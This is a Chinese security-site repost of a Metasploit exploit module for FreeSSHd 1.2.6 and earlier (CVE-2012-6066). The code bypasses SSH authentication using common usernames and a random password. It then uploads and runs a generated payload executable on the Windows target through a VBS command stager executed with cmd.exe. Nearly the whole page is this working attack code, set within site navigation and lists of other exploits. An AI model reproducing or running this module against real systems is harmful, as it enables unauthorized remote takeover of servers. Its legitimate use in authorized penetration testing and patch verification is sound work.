首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Freesshd Authentication Bypass
来源:metasploit.com 作者:Martini 发布时间:2013-01-16  

require 'msf/core'
require 'tempfile'
class Metasploit3 < Msf::Exploit::Remote
 Rank = ExcellentRanking

 include Msf::Exploit::Remote::Tcp
 include Msf::Exploit::EXE

 def initialize(info={})
  super(update_info(info,
   'Name'           => "Freesshd Authentication Bypass",
   'Description'    => %q{
     This module exploits a vulnerability found in FreeSSHd <= 1.2.6 to bypass
    authentication. You just need the username (which defaults to root). The exploit
    has been tested with both password and public key authentication.
   },
   'License'        => MSF_LICENSE,
   'Author'         =>
    [
     'Aris', # Vulnerability discovery and Exploit
     'kcope', # 2012 Exploit
     'Daniele Martini <cyrax[at]pkcrew.org>' # Metasploit module
    ],
   'References'     =>
    [
     [ 'CVE', '2012-6066' ],
     [ 'OSVDB', '88006' ],
     [ 'BID', '56785' ],
     [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2012-12/0012.html' ],
     [ 'URL', 'http://seclists.org/fulldisclosure/2010/Aug/132' ]
    ],
   'Platform'       => 'win',
   'Privileged'     => true,
   'DisclosureDate' => "Aug 11 2010",
   'Targets' =>
    [
     [ 'Freesshd <= 1.2.6 / Windows (Universal)', {} ]
    ],
   'DefaultTarget' => 0
  ))

  register_options(
   [
    OptInt.new('RPORT', [false, 'The target port', 22]),
    OptString.new('USERNAMES',[true,'Space Separate list of usernames to try for ssh authentication','root admin Administrator'])
   ], self.class)
 end

 def load_netssh
  begin
   require 'net/ssh'
   return true
  rescue LoadError
   return false
  end
 end

 def check
  connect
  banner = sock.recv(30)
  disconnect
  if banner =~ /SSH-2.0-WeOnlyDo/
   version=banner.split(" ")[1]
   return Exploit::CheckCode::Vulnerable if version =~ /(2.1.3|2.0.6)/
   return Exploit::CheckCode::Appears
  end
  return Exploit::CheckCode::Safe
 end


 def upload_payload(connection)
  exe = generate_payload_exe
  filename = rand_text_alpha(8) + ".exe"
  cmdstager = Rex::Exploitation::CmdStagerVBS.new(exe)
  opts = {
   :linemax => 1700,
   :decoder => File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64"),
  }

  cmds = cmdstager.generate(opts)

  if (cmds.nil? or cmds.length < 1)
   print_error("The command stager could not be generated")
   raise ArgumentError
  end
  cmds.each { |cmd|
   ret = connection.exec!("cmd.exe /c "+cmd)
  }

 end

 def setup_ssh_options
  pass=rand_text_alpha(8)
  options={
   :password => pass,
   :port     => datastore['RPORT'],
   :timeout  => 1,
   :proxies  => datastore['Proxies'],
   :key_data => OpenSSL::PKey::RSA.new(2048).to_pem
  }
  return options
 end

 def do_login(username,options)
  print_status("Trying username "+username)
  options[:username]=username

  transport = Net::SSH::Transport::Session.new(datastore['RHOST'], options)
  auth = Net::SSH::Authentication::Session.new(transport, options)
  auth.authenticate("ssh-connection", username, options[:password])
  connection = Net::SSH::Connection::Session.new(transport, options)
  begin
   Timeout.timeout(10) do
    connection.exec!('cmd.exe /c echo')
   end
  rescue  RuntimeError
   return nil
  rescue Timeout::Error
   print_status("Timeout")
   return nil
  end
  return connection
 end

 def exploit
  #
  # Load net/ssh so we can talk the SSH protocol
  #
  has_netssh = load_netssh
  if not has_netssh
   print_error("You don't have net/ssh installed.  Please run gem install net-ssh")
   return
  end

  options=setup_ssh_options

  connection = nil

  usernames=datastore['USERNAMES'].split(' ')
  usernames.each { |username|
   connection=do_login(username,options)
   break if connection
  }

  if connection
   print_status("Uploading payload. (This step can take up to 5 minutes. But if you are here, it will probably work. Have faith.)")
   upload_payload(connection)
   handler
  end
 end
end

 


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Serva v2.0.0 HTTP Server GET R
·Nagios3 history.cgi Host Comma
·Serva v2.0.0 DNS Server QueryN
·Atheme IRC Services 7.0.5 Deni
·Nagios history.cgi Remote Comm
·SonicWALL GMS/VIEWPOINT 6.x An
·Java Applet JMX Remote Code Ex
·PHP-Charts 1.0 PHP Code Execut
·Microsoft Lync 2012 Code Execu
·Novell NCP Pre-Auth Remote Roo
·Ruby on Rails XML Processor YA
·Jenkins CI Script Console Comm
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved